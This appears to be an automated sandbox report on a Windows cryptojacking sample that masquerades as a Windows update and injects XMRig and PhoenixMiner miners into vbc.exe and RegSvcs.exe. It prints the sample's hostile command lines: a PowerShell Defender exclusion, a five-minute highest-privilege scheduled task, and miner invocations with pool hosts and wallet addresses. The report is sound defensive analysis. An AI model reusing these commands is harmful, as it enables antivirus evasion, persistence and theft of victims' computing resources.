Analysis
-
max time kernel
61s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 20:24
Static task
static1
Behavioral task
behavioral1
Sample
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
Resource
win7-20220901-en
General
-
Target
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe
-
Size
844KB
-
MD5
64305a05cadf0f450c184acbc40c9f15
-
SHA1
9c946fce006da78a7a9e2fb22199a381d0d03775
-
SHA256
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d
-
SHA512
342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d
-
SSDEEP
12288:DN43C+LS+Eb4Y/O23Aca/nORmxBcYeiBp:x4S+UJ/CciOReB
Malware Config
Signatures
-
Detectes Phoenix Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1576-164-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/1576-163-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix behavioral2/memory/1576-166-0x0000000140000000-0x000000014082B000-memory.dmp miner_phoenix -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1420-152-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1420-153-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/1420-154-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1420-155-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1420-157-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1420-167-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
ULK.exepid process 2616 ULK.exe -
Processes:
resource yara_rule behavioral2/memory/1576-159-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/1576-161-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/1576-162-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/1576-164-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/1576-163-0x0000000140000000-0x000000014082B000-memory.dmp upx behavioral2/memory/1576-166-0x0000000140000000-0x000000014082B000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ULK.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation ULK.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
RegSvcs.exepid process 1576 RegSvcs.exe 1576 RegSvcs.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
ULK.exedescription pid process target process PID 2616 set thread context of 1420 2616 ULK.exe vbc.exe PID 2616 set thread context of 1576 2616 ULK.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 856 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exeULK.exepid process 2576 powershell.exe 2576 powershell.exe 540 powershell.exe 540 powershell.exe 2616 ULK.exe 2616 ULK.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exepowershell.exeULK.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 1576 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2616 ULK.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeLockMemoryPrivilege 1420 vbc.exe Token: SeLockMemoryPrivilege 1420 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 1420 vbc.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.execmd.exeULK.execmd.exedescription pid process target process PID 1576 wrote to memory of 2576 1576 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe powershell.exe PID 1576 wrote to memory of 2576 1576 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe powershell.exe PID 1576 wrote to memory of 5060 1576 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe cmd.exe PID 1576 wrote to memory of 5060 1576 89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe cmd.exe PID 5060 wrote to memory of 856 5060 cmd.exe timeout.exe PID 5060 wrote to memory of 856 5060 cmd.exe timeout.exe PID 5060 wrote to memory of 2616 5060 cmd.exe ULK.exe PID 5060 wrote to memory of 2616 5060 cmd.exe ULK.exe PID 2616 wrote to memory of 540 2616 ULK.exe powershell.exe PID 2616 wrote to memory of 540 2616 ULK.exe powershell.exe PID 2616 wrote to memory of 116 2616 ULK.exe cmd.exe PID 2616 wrote to memory of 116 2616 ULK.exe cmd.exe PID 116 wrote to memory of 2952 116 cmd.exe schtasks.exe PID 116 wrote to memory of 2952 116 cmd.exe schtasks.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1420 2616 ULK.exe vbc.exe PID 2616 wrote to memory of 1576 2616 ULK.exe RegSvcs.exe PID 2616 wrote to memory of 1576 2616 ULK.exe RegSvcs.exe PID 2616 wrote to memory of 1576 2616 ULK.exe RegSvcs.exe PID 2616 wrote to memory of 1576 2616 ULK.exe RegSvcs.exe PID 2616 wrote to memory of 1576 2616 ULK.exe RegSvcs.exe PID 2616 wrote to memory of 1576 2616 ULK.exe RegSvcs.exe PID 2616 wrote to memory of 1576 2616 ULK.exe RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe"C:\Users\Admin\AppData\Local\Temp\89ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9426.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\ProgramData\updateWindows\ULK.exe"C:\ProgramData\updateWindows\ULK.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ULK" /tr "C:\ProgramData\updateWindows\ULK.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 42T9sTTMxUFKM5dzD4Abv21q91YTVw3icZc6NkWGa2psJd8MCPtzXjtWNpjcTYtN9Ri83rPq7dGKBjhn3pyH5vGGG9d5FC7 -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xAA676adD882a7792EE0d7f3bBf25c045292b5d8e.Rig001 -coin etc -log 04⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\updateWindows\ULK.exeFilesize
844KB
MD564305a05cadf0f450c184acbc40c9f15
SHA19c946fce006da78a7a9e2fb22199a381d0d03775
SHA25689ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d
SHA512342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d
-
C:\ProgramData\updateWindows\ULK.exeFilesize
844KB
MD564305a05cadf0f450c184acbc40c9f15
SHA19c946fce006da78a7a9e2fb22199a381d0d03775
SHA25689ab000fd432f9ffda0c7d77ee273cf42b2c33b15caa2ef9b393a6c02ae66f7d
SHA512342a1892b18fdd24bc3ff00a75142f47feb5e68419e5db9e3021a043966e36b843578214a566e92e80c9c788f7a1809b40d9172d8ff382e8255ed869b99c7c7d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Temp\tmp9426.tmp.batFilesize
145B
MD5131129112dff074d7beb27a970d785f1
SHA1ffbe95a81a8a8a26d42c1bb0d322b6bd9259ee7e
SHA256cfca106366cc929c453b54bdd4f928cb2ac27f16444c962dd0a70568f23e1f4e
SHA512071eaa7b57235ccaed0035d3477187247ed4f763ee63555029cfdaffd4d714ff687ff72bf9b04c65ced757a13eded5a692e7ea3a14eb2a63f486c52b03f28159
-
memory/116-146-0x0000000000000000-mapping.dmp
-
memory/540-149-0x00007FFDF4740000-0x00007FFDF5201000-memory.dmpFilesize
10.8MB
-
memory/540-143-0x0000000000000000-mapping.dmp
-
memory/856-138-0x0000000000000000-mapping.dmp
-
memory/1420-158-0x000001DDF1960000-0x000001DDF19A0000-memory.dmpFilesize
256KB
-
memory/1420-156-0x000001DDEFE90000-0x000001DDEFEB0000-memory.dmpFilesize
128KB
-
memory/1420-157-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1420-155-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1420-152-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1420-167-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1420-154-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1420-168-0x000001DDF19A0000-0x000001DDF19C0000-memory.dmpFilesize
128KB
-
memory/1420-169-0x000001DDF19A0000-0x000001DDF19C0000-memory.dmpFilesize
128KB
-
memory/1420-153-0x0000000140343234-mapping.dmp
-
memory/1576-159-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/1576-163-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/1576-150-0x00007FFDF4740000-0x00007FFDF5201000-memory.dmpFilesize
10.8MB
-
memory/1576-135-0x00007FFDF4740000-0x00007FFDF5201000-memory.dmpFilesize
10.8MB
-
memory/1576-166-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/1576-164-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/1576-162-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/1576-161-0x0000000140000000-0x000000014082B000-memory.dmpFilesize
8.2MB
-
memory/1576-132-0x0000000000E50000-0x0000000000F28000-memory.dmpFilesize
864KB
-
memory/1576-160-0x0000000140829C40-mapping.dmp
-
memory/2576-136-0x00000209EF820000-0x00000209EF842000-memory.dmpFilesize
136KB
-
memory/2576-139-0x00007FFDF4740000-0x00007FFDF5201000-memory.dmpFilesize
10.8MB
-
memory/2576-133-0x0000000000000000-mapping.dmp
-
memory/2616-140-0x0000000000000000-mapping.dmp
-
memory/2616-151-0x00007FFDF4740000-0x00007FFDF5201000-memory.dmpFilesize
10.8MB
-
memory/2616-165-0x00007FFDF4740000-0x00007FFDF5201000-memory.dmpFilesize
10.8MB
-
memory/2616-144-0x00007FFDF4740000-0x00007FFDF5201000-memory.dmpFilesize
10.8MB
-
memory/2952-147-0x0000000000000000-mapping.dmp
-
memory/5060-134-0x0000000000000000-mapping.dmp